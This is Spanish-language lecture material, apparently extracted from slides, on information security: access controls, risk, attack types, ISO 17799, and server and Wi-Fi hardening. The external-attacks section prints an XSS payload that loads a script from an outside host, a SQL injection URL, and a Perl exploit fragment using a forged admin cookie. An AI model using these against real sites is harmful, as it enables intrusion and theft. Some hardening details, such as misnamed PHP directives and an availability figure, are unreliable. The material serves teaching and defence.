trabajando slo e independiente, pero lo que no podr ser posible ser la interconexin e
intercomunicacin de todos los centros de procesos de datos si es que no existen productos
compatibles y comunes.
CONTROLES TCNICOS ESPECFICOS Son tan importantes como los Controles Tcnicos Generales para lograr la Operatividad de los
Sistemas. Encargndose de verificar el funcionamiento correcto de partes especficas del sistema,
como parmetros de asignacin automtica de espacio en el disco, los cuales pueden impedir su
uso posterior por una seccin diferente a la que lo gener. Segn las seguridades fsicas y lgicas
detalladas anteriormente se tiene:
Control de Acceso como seguridad fsica
El control de acceso no slo requiere la capacidad de identificacin, sino tambin asociarla a la
apertura o cerramiento de puertas, permitir o negar acceso basado en restricciones de tiempo,
rea o sector dentro de una empresa o institucin.
- Utilizacin de Guardias
- Utilizacin de Detectores de Metales
- Utilizacin de Sistemas Biomtricos (identifican a la persona por lo que es manos, ojos,
huellas digitales y voz)
- Proteccin Electrnica
Controles de Acceso como seguridad lgica
Estos controles pueden implementarse en el Sistema Operativo, sobre los sistemas de aplicacin,
en bases de datos, en un paquete especfico de seguridad o en cualquier otro utilitario.
Constituyen una importante ayuda para proteger al sistema operativo de la red, al sistema de
aplicacin y dems software de la utilizacin o modificaciones no autorizadas; para mantener la
integridad de la informacin (restringiendo la cantidad de usuarios y procesos con acceso
permitido) y para resguardar la informacin confidencial de accesos no autorizados.
Es conveniente tener en cuenta otras consideraciones referidas a la seguridad lgica, como por
ejemplo las relacionadas al procedimiento que se lleva a cabo para determinar si corresponde un
permiso de acceso (solicitado por un usuario) a un determinado recurso.
Al respecto, el National Institute for Standars and Technology (NIST, Instituto Nacional de
estndares y tecnologa) ha resumido los siguientes estndares de seguridad que se refieren a los
requisitos mnimos de seguridad en cualquier empresa:
- Identificacin y Autentificacin
- Roles
- Transacciones
- Limitaciones a los Servicios
- Modalidad de Acceso
- Ubicacin y Horario
- Control de Acceso Interno
- Control de Acceso Externo
- Administracin
SEGURIDAD INFORMATICA Existen varias razones por las que a todos los niveles no se le ha dado a suficiente importancia:
1. El riesgo y las consecuencias de ignorarlo eran mnimos
2. Siempre ha sido incomoda: mucho esfuerzo -> poco resultado
3. Los posibles ataques requeran muy altos niveles de conocimiento.
4. El acceso al conocimiento y a las redes era muy limitado
Qu es el riesgo?
Riesgo = vulnerabilidades * amenazas
Si no hay amenazas no hay riesgo Si no hay vulnerabilidades no hay riesgo
Factores que se consideraban fuentes de amenazas:
Preocupaciones y riesgos actuales
Si adems tenemos en cuenta que:
Hoy da todo esta conectado con todo
El nmero de usuarios de la red crece exponencialmente
Cada vez hay ms sistemas y servicios en la red
El nivel de riesgo es suficientemente alto como para empezar a pensar en la seguridad como algo
imprescindible
Tipos de ataques actuales:
Ataques hbridos
Son ataques en los que se mezclan ms de una tcnica:
DOS, DDOS, Exploits, Escaneos, Troyanos, Virus, Buffer Overflows, Inyecciones, etc.
Suelen ser de muy rpida propagacin y siempre se basan en alguna vulnerabilidad de algn
sistema.
Por ejemplo los gusanos Blaster, Sasser, o Slammer se propagaron por todo el planeta en cuestin
de pocas horas gracias a una mezcla de tcnicas de uso de vulnerabilidad, Buffer Overflows,
escaneado de direcciones, transmisin va Internet, y mimetizacin en los sistemas.
Como curiosidad: el 75% de los ataques tienen como teln de fondo tcnicas de Buffer Overflow
no podran ser evitadas?
Tipos de ataques actuales:
Ingeniera social
Son ataques en los que se intenta engaar a algn usuario para hacerle creer como cierto algo que
no lo es.
- Buenos das, es la secretaria del Director del Departamento?
- Si digame, que desea?
- Soy Pedro, tcnico informtico del Centro de Apoyo a Usuarios y me han avisado para
reparar un virus del ordenador del director pero la clave que me han indicado para entrar
no es correcta,
Otros ataques de este tipo son:
Farming
SPAM
Pishing
Cajeros automticos
ETC.
Ingeniera social
El ataque que ms preocupa hoy en da a las grandes organizaciones, sobre todo en el sector de
banca online es, con diferencia, el PISHING:
Qu preocupa y qu no en un proyecto de seguridad?
Existe un problema subyacente en la mente de TODOS los Directores de informtica de las grandes
compaas que nunca debemos olvidar si queremos tener xito en la implantacin de un sistema
de seguridad:
La compaa puede vivir sin seguridad pero no sin comunicaciones
Si un sistema de seguridad, por muy maravilloso que sea, destinado a evitar problemas que
pueden no haberse producido aun puede generar problemas
Nuevos, ese sistema NO SERA ACEPTADO.
Donde queda la criptografa en todo esto?
Los estndares actuales de cifrado de la informacin (AES, DES, RSA, MD5, etc., etc.) son
globalmente aceptados como buenos y suficientes en la mayora de los casos, quedando su
estudio reducidos a pocos entornos, Universidades, Fuerzas del Orden, Ministerios, etc.
La criptografa capta la atencin general pocas veces, pero cuando lo hace suele ser por algo serio,
cuando algn protocolo y/o algoritmo es reventado. Por ejemplo, WEP, el cifrado que usan las
redes WiFi basado en RC4 que puede ser descifrado si se consigue una captura de trfico
suficientemente grande.
El Coste de la seguridad
El esfuerzo tanto econmico como humano de los Departamentos de Seguridad debe buscar
siempre cuatro objetivos:
1. Disponibilidad: Se consideran sistemas aceptables a partir de dos nueves, esto es:
disponibles el 99,99% del tiempo. La inversin por cada nueve extra es siempre muy
elevada.
2. Confidencialidad: Seguridad keep the good giys in
3. Integridad: Seguridad Keep the bad guys out
4. Cumplimiento de la legalidad: LOPD, Sarbanes-Oxley, ISO17799
El esfuerzo econmico en seguridad es imposible de medir pero como ste debe ser siempre
proporcional al riesgo de perdidas, que SI ES MEDIBLE, si es posible hacer estimaciones razonables
Problemas colaterales de la seguridad
en las grandes compaas
1. Costes & ROI (Return of Investment)
1. Costes de personal
a. Difcil encontrar tcnicos cualificados
b. Muy alta rotacin en segn que sectores
2. Costes tecnolgicos: HW, SW, ROI
3. Costes ocultos (a menudo elevados)
4. Costes de cumplimiento de la legalidad (LOPD, Sarbanes-Oxley, etc)
5. Costes de cumplimiento de polticas y normativas
6. Costes de seguros (aprox. 25% de las compaas)
Problemas colaterales de la seguridad en las grandes compaas
2. De organizacin
Lleva mucho tiempo y esfuerzo conocer e integrar cualquier sistema de seguridad cuando hay
implicado ms de un departamento.
Se estima que 30 minutos de un Hacker pueden suponer una semana de trabajo de un ingeniero
con experiencia para reparar lo daado y prevenir nuevos incidentes
3. De garanta de disponibilidad
4. De garanta de ajuste a normativa y legalidad
Entonces Cunto se suele gastar en seguridad?
TECNOLOGAS Qu tecnologas existen y cul es su estado actual?
Desde el punto de vista empresarial existen dos posibles enfoques para clasificar los sistemas de
seguridad:
1. Segn coste:
a. Software libre: Linux, Snort, Nessus, Ethereal, etc. Suele ser difcil implantar este
tipo de sistemas salvo que haya verdaderos problemas presupuestarios.
b. Sistemas propietarios: Microsoft, Sun, IBM, Symantec, ISS, Checkpoint, Trend, etc.
Gran calidad debida a la competencia
2. Desde el punto de vista de su utilidad:
a. Keep the good guys in: VPN, PKI, RAS, Radius, Tacacs+, Single Sing On, etc.
b. Keep the bad guys out: AntiVirus, FW, IPS, IDS, ADS, etc.
Qu grado de implantacin tiene cada una?
Cules son las tendencias actuales ?
Firewalls
Todas las compaas montan sistemas de filtrado de paquetes, bien mediante FireWalls, bien
mediante listas de control de acceso en routers.
Existen FW personales cuya utilidad suele cuestionarse (a favor de los IPS personales) Antivirus
Se montan siempre a dos niveles: a nivel de red (para filtrar correo electrnico principalmente) y a
nivel de puesto de trabajo.
IDS
Los sistemas de deteccin de intrusos han estado ayudando a detectar problemas en las redes
durante aos pero su incapacidad de detener los ataques que ellos mismos detectaban y la gran
cantidad de alarmas que generaban (imposibles de perseguir) han dado paso a los IPSs
IPS
Estn en pleno auge. Son capaces de detectar y detener tantos ataques conocidos como
desconocidos, detectar y detener virus, troyanos, aislar hackers cuando se les detecta y hasta
proteger a los otros elementos de seguridad de la red, por ejemplo a los Firewalls.
ADS
Sistemas de deteccin de anomalias. Son totalmente novedosos y an es pronto para hablar de
sus resultados reales.
Single Sign-on
Han sido, son y seguirn siendo de gran utilidad, mxime en las grandes empresas donde la gran
variedad de sistemas y claves a memorizar convierten los post-it junto a los monitores en algo
comn.
Control de acceso a red
Microsoft y Cisco estn en plena pugna por llevarse el gato al agua en lo que a control de acceso
a red se refiere y aunque recientemente anunciaron su intencin de colaborar, lo cierto es que
cada uno sigue por su lado, NAP, NAC el tiempo dir
VPN + PKI
Durante aos el binomio VPN + PKI han dominado el mundo de los accesos remotos seguros pero
la necesidad de instalar un cliente de VPN en el PC los ha hecho incmodos. Estn dejando paso a
marchas forzadas a las VPN + SSL.
VPN + SSL
Sin ms complejidad para el cliente que conectarse a una pgina web segura de la compaa para
poder entrar en ella va VPN. Sencillas, cmodas y ligeras. Existen ya sistemas basados en
appliances de red.
ROLES INVOLUCRADOS EN SEGURIDAD USUARIOS
Usuarios comunes:
Los usuarios se acostumbran a usar la tecnologa sin saber como funciona o de los
riesgos que pueden correr.
Son el punto de entrada de muchos de los problemas crnicos.
Son El eslabn ms dbil en la cadena de seguridad.
2 enfoques para controlarlos:
Principio del MENOR PRIVILEGIO POSIBLE:
Reducir la capacidad de accin del usuario sobre los sistemas.
Objetivo: Lograr el menor dao posible en caso de incidentes.
EDUCAR AL USUARIO:
Generar una cultura de seguridad. El usuario ayuda a reforzar y aplicar los
mecanismos de seguridad.
Objetivo: Reducir el nmero de incidentes
CREADORES DE SISTEMAS
Creando Software:
El software moderno es muy complejo y tiene una alta probabilidad de contener
vulnerabilidades de seguridad.
Un mal proceso de desarrollo genera software de mala calidad. Prefieren que salga
mal a que salga tarde.
Usualmente no se ensea a incorporar requisitos ni protocolos de seguridad en los
productos de SW.
Propiedades de la Informacin en un Trusted System
Confidencialidad: Asegurarse que la informacin en un sistema de cmputo y la
transmitida por un medio de comunicacin, pueda ser leda SOLO por las personas
autorizadas.
Autenticacin: Asegurarse que el origen de un mensaje o documento electrnico
esta correctamente identificado, con la seguridad que la entidad emisora o
receptora no esta suplantada.
Integridad: Asegurarse que solo el personal autorizado sea capaz de modificar la
informacin o recursos de cmputo.
No repudiacin: Asegurarse que ni el emisor o receptor de un mensaje o accin sea
capaz de negar lo hecho.
Disponibilidad: Requiere que los recursos de un sistema de cmputo estn
disponibles en el momento que se necesiten.
Ataques contra el flujo de la informacin
FLUJO NORMAL
Los mensajes en una red se envan a partir de un emisor a uno o varios
receptores
El atacante es un tercer elemento; en la realidad existen millones de
elementos atacantes, intencionales o accidentales.
Emisor Receptor
Atacante
INTERRUPCION
El mensaje no puede llegar a su destino, un recurso del sistema es destruido
o temporalmente inutilizado.
Este es un ataque contra la Disponibilidad
Ejemplos: Destruccin de una pieza de hardware, cortar los medios de
comunicacin o deshabilitar los sistemas de administracin de archivos.
INTERCEPCION
Una persona, computadora o programa sin autorizacin logra el acceso a un
recurso controlado.
Es un ataque contra la Confidencialidad.
Ejemplos: Escuchas electrnicos, copias ilcitas de programas o datos,
escalamiento de privilegios.
Emisor Receptor
Atacante
Emisor Receptor
Atacante
MODIFICACION
La persona sin autorizacin, adems de lograr el acceso, modifica el
mensaje.
Este es un ataque contra la Integridad.
Ejemplos: Alterar la informacin que se transmite desde una base de datos,
modificar los mensajes entre programas para que se comporten diferente.
FABRICACION
Una persona sin autorizacin inserta objetos falsos en el sistema.
Es un ataque contra la Autenticidad.
Ejemplos: Suplantacin de identidades, robo de sesiones, robo de
contraseas, robo de direcciones IP, etc...
Es muy difcil estar seguro de quin esta al otro lado de la lnea.
Emisor Receptor
Atacante
Emisor Receptor
Atacante
GERENTES
Para que esperar
Si gastas ms dinero en caf que en Seguridad Informtica, entonces vas a ser
hackeado, es ms, mereces ser hackeado
La mayora de las empresas incorporan medidas de seguridad hasta que han tenido
graves problemas. para que esperarse?
Siempre tenemos algo de valor para alguien
Razones para atacar la red de una empresa:
$$$, ventaja econmica, ventaja competitiva, espionaje poltico, espionaje
industrial, sabotaje,
Empleados descontentos, fraudes, extorsiones, (insiders).
Espacio de almacenamiento, ancho de banda, servidores de correo (SPAM),
poder de cmputo, etc
Objetivo de oportunidad.
Siempre hay algo que perder:
Cunto te cuesta tener un sistema de cmputo detenido por causa de un incidente
de seguridad?
Costos econmicos (perder oportunidades de negocio).
Costos de recuperacin.
Costos de reparacin.
Costos de tiempo.
Costos legales y judiciales.
Costos de imagen.
Costos de confianza de clientes.
Perdidas humanas (cuando sea el caso).
Qu hacer?
Los altos niveles de la empresa tienen que apoyar y patrocinar las iniciativas de
seguridad.
Las polticas y mecanismos de seguridad deben de exigirse para toda la empresa.
Con su apoyo se puede pasar fcilmente a enfrentar los problemas de manera
proactiva (en lugar de reactiva como se hace normalmente)
HACKER CRACKER
Cracking:
Los ataques son cada vez mas complejos.
Cada vez se requieren menos conocimientos para iniciar un ataque.
Mxico es un paraso para el cracking.
Por qu alguien querra introducirse en mis sistemas?
Por qu no? Si es tan fcil:
Descuidos
Desconocimiento
Negligencias (factores humanos).
Quienes atacan los sistemas?
Gobiernos Extranjeros.
Espas industriales o polticos.
Criminales.
Empleados descontentos y abusos internos.
Adolescentes sin nada que hacer
Niveles de Hackers:
Nivel 3: (ELITE) Expertos en varias reas de la informtica, son los que usualmente
descubren los puntos dbiles en los sistemas y pueden crear herramientas para
explotarlos.
Nivel 2: Tienen un conocimiento avanzado de la informtica y pueden obtener las
herramientas creadas por los de nivel 3, pero pueden darle usos ms preciso de
acuerdo a los intereses propios o de un grupo.
Nivel 1 o Script Kiddies: Obtienen las herramientas creadas por los de nivel 3, pero
las ejecutan contra una vctima muchas veces sin saber lo que estn haciendo.Son
los que con ms frecuencia realizan ataques serios.
Cualquiera conectado a la red es una vctima potencial, sin importar a que se dedique, debido a
que muchos atacantes slo quieren probar que pueden hacer un hack por diversin.
ADMINISTRADORES DE T.I.
ADMINISTRADORES DE TI:
Son los que tienen directamente la responsabilidad de vigilar a los otros roles.
(aparte de sus sistemas).
Hay actividades de seguridad que deben de realizar de manera rutinaria.
Obligados a capacitarse, investigar, y proponer soluciones e implementarlas.
Tambin tiene que ser hackers: Conocer al enemigo, proponer soluciones
inteligentes y creativas para problemas complejos.
Puntos Dbiles en los Sistemas
Qu se debe asegurar ?
Siendo que la informacin debe considerarse como un recurso con el que cuentan las
Organizaciones y por lo tanto tiene valor para stas, al igual que el resto de los activos, debe estar
debidamente protegida.
Contra qu se debe proteger la Informacin ?
La Seguridad de la Informacin, protege a sta de una amplia gama de amenazas, tanto de orden
fortuito como destruccin, incendio o inundaciones, como de orden deliberado, tal como fraude,
espionaje, sabotaje, vandalismo, etc.
Qu se debe garantizar?
Confidencialidad: Se garantiza que la informacin es accesible slo a
aquellas personas autorizadas a tener acceso a la misma.
Integridad: Se salvaguarda la exactitud y totalidad de la informacin y los
mtodos de procesamiento.
Disponibilidad: Se garantiza que los usuarios autorizados tienen acceso a la
informacin y a los recursos relacionados con la misma toda vez que se
requiera.
Porqu aumentan las amenazas?
Las Organizaciones son cada vez mas dependientes de sus Sistemas y Servicios de Informacin,
por lo tanto podemos afirmar que son cada vez mas vulnerables a las amenazas concernientes a su
seguridad. Algunas causas son:
Crecimiento exponencial de las Redes y Usuarios Interconectados
Profusin de las BD On-Line
Inmadurez de las Nuevas Tecnologas
Alta disponibilidad de Herramientas Automatizadas de Ataques
Nuevas Tcnicas de Ataque Distribuido (Ej:DDoS)
Tcnicas de Ingeniera Social
Cules son las amenazas?
Accidentes: Averas, Catstrofes, Interrupciones.
Errores: de Uso, Diseo, Control.
Intencionales Presenciales: Atentado con acceso fsico no autorizado.
Intencionales Remotas: Requieren acceso al canal de comunicacin.
Interceptacin pasiva de la informacin (amenaza a la
CONFIDENCIALIDAD).
Corrupcin o destruccin de la informacin (amenaza a la
INTEGRIDAD).
Suplantacin de origen (amenaza a la AUTENTICACIN)
Cmo resolver el desafo de la seguridad informtica?
Las tres primeras tecnologas de proteccin ms utilizadas son el control de
acceso/passwords (100%), software anti-virus (97%) y firewalls (86%)
Los ataques ms comunes durante el ltimo ao fueron los virus informticos (27%)
y el spammimg de correo electrnico (17%) seguido de cerca (con un 10%) por los
ataques de denegacin de servicio y el robo de notebook:
El problema de la Seguridad Informtica est en su Gerenciamiento y no en las tecnologas
disponibles
Aspectos Legales
Requerimiento bsico
Apoyo de la Alta Gerencia
RRHH con conocimientos y experiencia
RRHH capacitados para el da a da
Recursos Econmicos
Tiempo
Anlisis de Riesgos
Se considera Riesgo Informtico, a todo factor que pueda generar una
disminucin en:
Amenazas Internas
Externas
Proteccin de la Informacin
Confidencialidad Integridad Disponibilidad
Confidencialidad Disponibilidad - Integridad
Determina la probabilidad de ocurrencia
Determina el impacto potencial
Modelo de Gestin
Poltica de Seguridad:
Conjunto de Normas y Procedimientos documentados y comunicados, que tienen por objetivo
minimizar los riesgos informticos mas probables
Plan de Contingencias
Conjunto de Normas y Procedimientos documentados y comunicados, cuyo objetivo es recuperar
operatividad mnima en un lapso adecuado a la misin del sistema afectado, ante emergencias
generadas por los riesgos informticos
Involucra
Uso de herramientas
Activos Amenazas
Impactos Vulnerabilidades
Riesgos
Funcin
Correctiva
Reduce
Funcin
Preventiva
Reduce
Involucra
Uso de herramientas
Cumplimiento de Tareas por parte de
personas
Cumplimiento de Tareas por parte de personas
Control por Oposicin
Auditora Informtica Interna capacitada
Equipo de Control por Oposicin Formalizado
Outsourcing de Auditora
Herramientas:
Copias de Resguardo
Control de Acceso
Encriptacin
Antivirus
Barreras de Proteccin
Sistemas de Deteccin de Intrusiones
Uso de Estndares
Norma ISO/IRAM 17.799
Estndares Internacionales
- Norma basada en la BS 7799
- Homologada por el IRAM
ORGANIZACION DE LA SEGURIDAD
Infraestructura de la Seguridad de la Informacin
Seguridad del Acceso de terceros
Servicios provistos por otras Organizaciones
CLASIFICACION Y CONTROL DE BIENES
Responsabilidad de los Bienes
Clasificacin de la Informacin
SEGURIDAD DEL PERSONAL
Seguridad en la definicin y la dotacin de tareas
Capacitacin del usuario
Respuesta a incidentes y mal funcionamiento de la Seguridad
SEGURIDAD FISICA Y AMBIENTAL
reas Seguras
Seguridad de los Equipos
Controles generales
GESTION DE LAS COMUNICACIONES Y LAS OPERACIONES
Procedimientos operativos y responsabilidades
Planificacin y aceptacin del Sistema
Proteccin contra el software maligno
Tares de acondicionamiento
Administracin de la red
Intercambio de informacin y software
CONTROL DE ACCESO
Requisitos de la Organizacin para el control de acceso
Administracin del acceso de usuarios
Responsabilidades de los usuarios
Control de acceso de la Red
Control de acceso al Sistema Operativo
Control de acceso de las Aplicaciones
Acceso y uso del Sistema de Monitoreo
Computadoras mviles y trabajo a distancia
DESARROLLO Y MANTENIMIENTO DE LOS SISTEMAS
Requisitos de Seguridad de los Sistemas
Seguridad de los Sistemas de Aplicacin
Controles Criptogrficos
Seguridad de los archivos del Sistema
Seguridad de los procesos de desarrollo y soporte
DIRECCION DE LA CONTINUIDAD DE LA ORGANIZACION
Aspectos de la direccin de continuidad de la Organizacin
CUMPLIMIENTO
Cumplimiento con los requisitos legales
Revisin de la Poltica de seguridad y del Cumplimiento Tcnico
Consideracin de las Auditoras del Sistema
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Ataques Internos
- Premeditacin (Empleados mal intencionados o ex empleados con informacin privilegiada)
- Descuido
- Ignorancia
- Indiferencia de las politicas de seguridad
Ataques externos
- - Hackers, Crackers, Lammers, Script-Kiddies
- - Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.
Ataques Internos
Suplantacin de identidad
Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR)
Robo de informacin (Ej: para la competencia)
Virus, Troyanos, Gusanos
Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc
Keylogging - Keycatching
Keycatcher:
Ataques Externos
Ataques contra servicios WEB
Cross Site Scripting (XSS)
SQL Injection
Exploits
Robo de Identidad
Denegacin de Servicio (DoS) y Denegacin de Servicio Distribuido (DDoS)
SPAM
VIRUS
Phishing (Whishing, Hishing)
Troyanos
XSS:
http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='http:
//h4k.in/i.js';document.body.appendChild(a);//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E
SQL Injection:
http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM
admin_login--
Ejemplo de un exploit en PERL:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl \n";
exit;
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0;
path=/;");
$t = $resp->content;
#print $t;
";
COMO NOS DEFENDEMOS?
Debemos crear una lista de mandamientos que debemos seguir al pie de la letra.
No olvidarse que el hecho de no cumplir con alguno de estos mandamientos inevitablemente
caeremos en un mayor riesgo para los servicios que queremos proteger.
LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD
Siempre respetar las polticas de seguridad
Siempre tener nuestros servicios actualizados a la ltima versin conocida estable
Utilizar mecanismos de criptografa para almacenar y transmitir datos sensibles
Cambiar las claves cada cierto tiempo
Auto-auditar nuestros propios servicios. Autoatacarnos para saber si somos o no
vulnerables
Estar siempre alerta. Nunca pensar a nosotros nadie nos ataca.
No dejar respaldos con informacin sensible en directorios web
No usar las mismas claves para servicios distintos (ej, la clave de root sea la misma que la
de MySQL)
SERVICIOS DE INTERNET
- Cambiar los puertos por defecto
- Garantizar el acceso solo a cuentas especficas
- Aplicar tcnicas de Hardening
- Para servicios privados y confidenciales utilizar tneles seguros (VPN cifradas) en Internet y
redes no seguras
- Eliminar todos los banners posibles y sobre todo las versiones
- Habilitar mdulos de seguridad (Ej mod_security en Apache)
- Levantar Firewalls e IDS/IPS
- Crear cuentas de sistema restringidas (aunque no tengan privilegios)
SERVICIOS DE INTERNET
- Nunca trabajar con root si no es estrictamente necesario
- Proteger con doble contrasea si es posible
- Elegir contraseas seguras, mezclando maysculas, minsculas, nmeros y caracteres
especiales. Las claves no deben ser palabras coherentes (ej: Admin25)
- Cerrar puertos y eliminar aplicaciones innecesarias
- Borrar robots.txt y estadsticas pblicas
- Proteger las URL (ej: mod_rewrite)
SERVICIOS DE INTERNET
Tener cuidado con los archivos temporales en directorios WEB. Ejemplo:
index.php~ (terminados en caracter squiggle o pigtail (literalmente: cola de chancho)
- Realizar respaldos peridicamente y probar que funcionen
- Conocer las tcnicas de ataque ms conocidas
- Auditar los cdigos con herramientas de seguridad
- Si ejecutan algn servidor de base de datos, permitir solamente comunicacin con interfaz
loopback y no dejar sin contrasea las bases de datos.
- En lo posible no utilizar servicios como:
- WEBMIN
- phpMyAdmin
- Interfaces WEB en routers o dispositivos de red
UN POCO MAS DE SEGURIDAD CON APACHE Y PHP
Apache. En httpd.conf activar las siguientes directivas:
ServerTokens Prod
ServerSignature Off
ServerAdmin
habilitar mod_security y mod_rewrite
PHP .En php.ini
php_expose=off
esconde php
mode_safe=on
evita que se ejecuten funciones como system(), passthru(), exec(), etc.
evitar scripts con phpinfo();
Algunos ejemplos:
PROTECCIN DE REDES WI-FI EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN EXTENSIN FSICA (No hay cables) LO QUE
CONLLEVA A QUE SEA MS FCIL ACCEDER A ELLAS REMOTAMENTE
EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR PARA REDUCIR EL RIESGO DE ATAQUES.
Direccin: http://www.sitioweb.com/config.php~
Apagar el router o access point cuando no se ocupe
Nunca entregar la clave Wi-Fi a terceros
Utilizar claves de tipo WPA2. Como segunda opcin WPA y en el peor de los casos WEP
(128 y 64 bits)
Habilitar el control de acceso por MAC. Son fciles de clonar pero pone una barrera ms
Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH, etc)
Deshabilitar el acceso inalmbrico a la configuracin
Cambiar los puertos por defecto de los servicios necesarios en el router (ej: http a 1000)
Desactivar el broadcasting SSID
Desactivar DHCP. Utilizar slo IP manuales dentro de rangos poco convencionales. (Ej:
90.0.10.0 90.0.10.254)
Usar VPN si fuese posible.
Cambiar regularmente las claves Wi-Fi (tanto administracin como clave de red).
Guardar bien las claves de administracin
Usar contraseas complicadas. (Ej: E_aR@_1-x
No usar dispositivos Wi-Fi cerca de hornos microondas ni telfonos inalmbricos
Realizar un scaneo local de las redes disponibles para evitar interferencias.
LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11
HERRAMIENTAS DE SEGURIDAD COMERCIALES
GFI LANGUARD SECURITY SCANNER www.gfi.com
N-Stalker (ex N-Stealth) www.nstalker.com
ACUNETIX WEB SCANNER www.acunetix.com
HERRAMIENTAS DE SEGURIDAD GRATIS NMAP (Network Mapper) www.insecure.org/nmap
NESSUS www.nessus.org